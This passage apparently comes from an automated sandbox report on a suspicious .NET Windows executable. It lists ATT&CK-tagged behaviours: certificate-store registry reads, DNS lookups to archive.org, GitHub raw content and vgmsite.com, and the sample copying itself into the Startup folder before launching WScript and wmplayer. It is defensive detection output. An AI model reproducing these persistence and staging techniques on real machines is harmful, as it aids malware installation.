\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C\"; Key: \"BLOB\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"archive.org\"\n \"ia600905.us.archive.org\"\n \"raw.githubusercontent.com\"\n \"vgmsite.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 648C0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 65070000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" has an executable section named \".text\"\n \"xlsrvintl.dll\" has an executable section named \".text\"\n \"DISMHOST.EXE.67AB4E4F.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"xlsrvintl.dll\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67AB4E4F.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"DISMHOST.EXE.67AB4E4F.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" called \"CopyFileW\" to copy C:\\585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe to new location %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63C60000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 754E0000\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 750A0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\Microsoft_WMP_70_CheckForOtherInstanceMutex\"\n \"Local\\Microsoft_WMP_70_CheckForOtherInstanceMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-18", "type": 3, "relevance": 10, "name": "Accesses Software Policy Settings", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\"; Key: \"\")\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: 47:F9:77:BB:69:BA:4B:44:A5:77:26:F5:CD:9C:0A:9A:07:B0:77:44; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Go Daddy Root Certificate Authority - G2, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: 27:AC:93:69:FA:F2:52:07:BB:26:27:CE:FA:CC:BE:4E:F9:C3:19:B8; see report for more information)\n The input sample is signed with a certificate issued by \"OU=Go Daddy Class 2 Certification Authority, O=\"The Go Daddy Group\n Inc.\", C=US\" (SHA1: 34:0B:28:80:F4:46:FC:C0:4E:59:ED:33:F5:2B:3D:08:D6:24:29:64; see report for more information)\n The input sample is signed with a certificate issued by \"OU=Go Daddy Class 2 Certification Authority, O=\"The Go Daddy Group\n Inc.\", C=US\" (SHA1: 27:96:BA:E6:3F:18:01:E2:77:26:1B:A0:D7:77:70:02:8F:20:EE:E4; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: A6:64:9E:2D:CD:D4:5A:90:6C:88:B1:DF:B8:C7:E7:B8:5F:03:8B:73; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US\" (SHA1: 97:D8:C5:70:0F:12:24:6C:88:BC:FA:06:7E:8C:A7:4D:A8:62:67:28; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: 1B:51:1A:BE:AD:59:C6:CE:20:70:77:C0:BF:0E:00:43:B1:38:26:12; see report for more information)\n The input sample is signed with a certificate issued by \"CN=R10, O=Let's Encrypt, C=US\" (SHA1: 06:1D:18:D6:F5:10:B0:6D:B1:F4:F2:9C:42:21:64:39:96:0C:AA:BF; see report for more information)\n The input sample is signed with a certificate issued by \"CN=ISRG Root X1, O=Internet Security Research Group, C=US\" (SHA1: 00:AB:EF:D0:55:F9:A9:C7:84:FF:DE:AB:D1:DC:DD:8F:ED:74:14:36; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xlsrvintl.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67AB4E4F.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"xlsrvintl.dll\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"DISMHOST.EXE.67AB4E4F.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"xlsrvintl.dll\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"xlsrvintl.dll\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"wmplayer.exe\" searching for class \"WMPlayerApp\"\n \"wmplayer.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"wmplayer.exe\" with commandline \"/prefetch:6 /Open \"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Pr ...\" (UID: 00000000-00002988), Spawned process \"WScript.exe\" with commandline \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Y ...\" (UID: 00000000-00004824)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"wmplayer.exe\" with commandline \"/prefetch:6 /Open \"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Pr ...\" (UID: 00000000-00002988), Spawned process \"WScript.exe\" with commandline \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Y ...\" (UID: 00000000-00004824)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"wmplayer.exe\" (UID: 00000000-00002988) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"wmplayer.exe\" (UID: 00000000-00002988) was launched with modified environment variables: \"PSModulePath, Path, PATHEXT\"\n Process \"WScript.exe\" (UID: 00000000-00004824) was launched with modified environment variables: \"Path\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"585ba8eec406f5f8713c87028f4c6fc7ca04ad04baebcbcede96ff11dad47aca\" was detected as \".NET\" and name: \"Library\"\n 